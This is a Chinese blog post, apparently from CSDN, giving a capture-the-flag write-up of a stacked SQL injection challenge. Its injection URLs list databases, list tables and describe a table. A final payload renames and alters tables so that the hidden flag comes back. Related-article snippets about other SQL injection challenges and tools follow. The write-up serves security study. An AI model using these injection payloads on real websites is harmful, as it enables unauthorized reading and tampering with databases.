[强网杯]easy_sqli

最新推荐文章于 2024-05-29 17:42:14 发布
最新推荐文章于 2024-05-29 17:42:14 发布
阅读量791 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39504221/article/details/111135859
版权

环境:攻防世界

order by 3报错说明有两个字段
在这里插入图片描述
尝试union select
在这里插入图片描述
有很多关键字被ban了,那只能堆叠注入了
暴库

http://220.249.52.134:33346/?inject=-1';show databases;--+

在这里插入图片描述

ctftraining
information_schema
mysql
performance_schema
supersqli
test

暴ctftraining的表

http://220.249.52.134:33346/?inject=-1';use ctftraining;show tables;--+

在这里插入图片描述
简要数据库结构
在这里插入图片描述
用desc关键字查看各表结构,发现flag在supersqli库的1919810931114514表里,而搜索栏查询的是words表的id字段

http://220.249.52.134:33346/?inject=-1';use ctftraining;desc `FLAG_TABLE`;--+

最终payload

?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);

payload分析:
rename table words to words1; //将words表更名为words1

rename table 1919810931114514to words;//将1919810931114514表更名为words

alter table words change flag id varchar(100); //将words表中的字段flag更名为id

参考文章

L1s4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF EASY SQLI(虚拟用户)
qq_54929891的博客
03-01 1168
打开题目发现是一个登录框题目 ,按照常理一般UserName都是admin,密码随便弄一个试试 改变一下admin,会出来wrong user;看来账号就是admin了,想着这种题目不可能让我们死去注入吧,应该会有提示,便打开F12看看 发现有个注释的字符串,猜测是base32编码,因为: base64编码中包含大写字母(A-Z),小写字母(a-z),数字0-9以及+ / base32编码中只有大写字母(A-Z),数字234567,如果没有189就是base32编码 base16编码也..
青少年CTF擂台挑战赛 2024 #Round 1
NYG694的博客
03-02 1840
文件打开是一个print数组v4的地址和read函数,并且nx好像可写,输入长度可以利用,进行一个栈上写好自己的shell,然后在构造一个回到v4的地址,这样子就可以重新读取到写buf段上的shell,这里要注意shell的隔断用/00截断然后构造好栈上数据。一个sql注入题目,尝试使用二分查找,但只能爆出表名和列名,值一直出不来,后来采用布尔盲注,fuzz测试后发现没有加任何过滤,直接写脚本。第二题:为了求解方程 (5 + sqrt{x} = 8),我们可以分离平方根项,然后求解 (x)。
web题解 Easy_SQLi or 雏形系统 (解题方法思想)
最新发布
Z11762的博客
05-29 388
大致操作步骤理解为看到下边类似qsnctf.php文件类型的代码,需要你还原一下原来的代码长什么样子,具体操作方法有三个“手动结混淆”,“debug解混淆”,“编写脚本”。3)扫完果然有东西,一个php网页文件和一个txt文件,发现有用的东西好像都在php文件里,txt文件里暂时不知道它有啥用。1)进入题目环境,又是类似弱比较的上传界面,但是不论用弱口令还是,sql语句都出错,没有啥用,1)打开题目环境,如下是一个类似弱密码的格式,但是它又说是sql,还是按sql注入来。phpjm的混淆内容还原。
ctf(EasySQL)
Glacier_Mount的博客
10-07 591
查询语句的简单猜测
easy_sql解析
qq_73722777的博客
03-08 419
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
yuanxu8877的博客
11-28 802
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
SQLi Dumper v.8.3_sqli_
09-30
SQLi Dumper v.8.3_sqli_ 是一个专门针对SQL注入漏洞的渗透测试工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的...
Vega_sqli_源码
10-04
sqli tool for searching vulnarabiliti for your website
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
在Django框架中伪造捕捉到的URLconf值的方法
09-21
主要介绍了在Django框架中伪造捕捉到的URLconf值的方法,Django是Python各色人气框架中最为著名的一个,需要的朋友可以参考下
[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 715
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
easy_sql
qq_45951598的博客
11-23 1366
本次题目了来着ctf里的一道supersqli 这里加一个单引号发现报错 这里orderby3就错了,发现只有两个字段。 联合注入发现,有过滤
津门杯 easysql
Je3Z的博客
05-11 299
第一次遇到ssrf打sql注入吧 index.php的代码 <?php highlight_file(__FILE__); session_start(); $url = $_GET['url'] ?? false; if($url) { $a = preg_match("/file|dict/i", $url); if ($a==1) { exit(); } $
Easysql
weixin_43610673的博客
03-04 726
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6416
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
[极客大挑战 2019]EasySQL 1【万能密码】
PromisingQ
07-27 5346
进入靶场环境:http://9ed1290e-46ca-468f-a89e-b99c518c8cfa.node3.buuoj.cn/ 这真的是最简单的一道题,没有之一,直接尝试万能密码就找到了flag,需要注意的是传参时要给username和password均传递参数,虽然username中的%23会将后面的注释掉,但是也不可以不给。 /check.php?username=1'or 1=1%23&password=1 ...
sqli-labs实战记录(一)
0verWatch的博客
08-29 3154
前言 最近啊先自己SQL注入确实不行,我只能拿出sql注入的基础部分来练练收了,这个实验环境是sqlilabs 一些前置知识 系统函数 介绍几个常用函数: 1. version()——MySQL 版本 2. user()——数据库用户名 3. database()——数据库名 4. @@datadir——数据库路径 5. @@version_compile_os——操作系统版本 字...
[强网杯]easy_sql
fightte的博客
05-17 974
提交1和2会回显一个数组: 相当于1对应的值为“hahahah” 是key-value形式的输出。 尝试输入1’.返回报错,有注入漏洞 尝试1’or 1=1#,并用#截断,输出了三个数组: 尝试堆叠注入,即注入多组sql语句,其中有;隔开, 输入show databases返回了所有的数据表, 尝试查询表名:show tables; 显示了表的名字,在使用sql语句,show columns from xx,来查询其中列的名称: 上图是word的列名, 下图,再查出1919…中的列名: 用sql
select_sqli = "SELECT distinct chexing FROM sheji.sale where type_c='"+string+"' and time='"+year_month+"' order by rank_m ;"
06-01
根据你提供的 SQL 语句,错误信息提示在 ORDER BY 子句中引用了不在 SELECT 列表中的列 'sheji.sale.rank_m'。这可能是因为在 SELECT 列表中并没有包含 'rank_m' 这一列。你可以尝试修改 SQL 语句,将 'rank_m' 列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值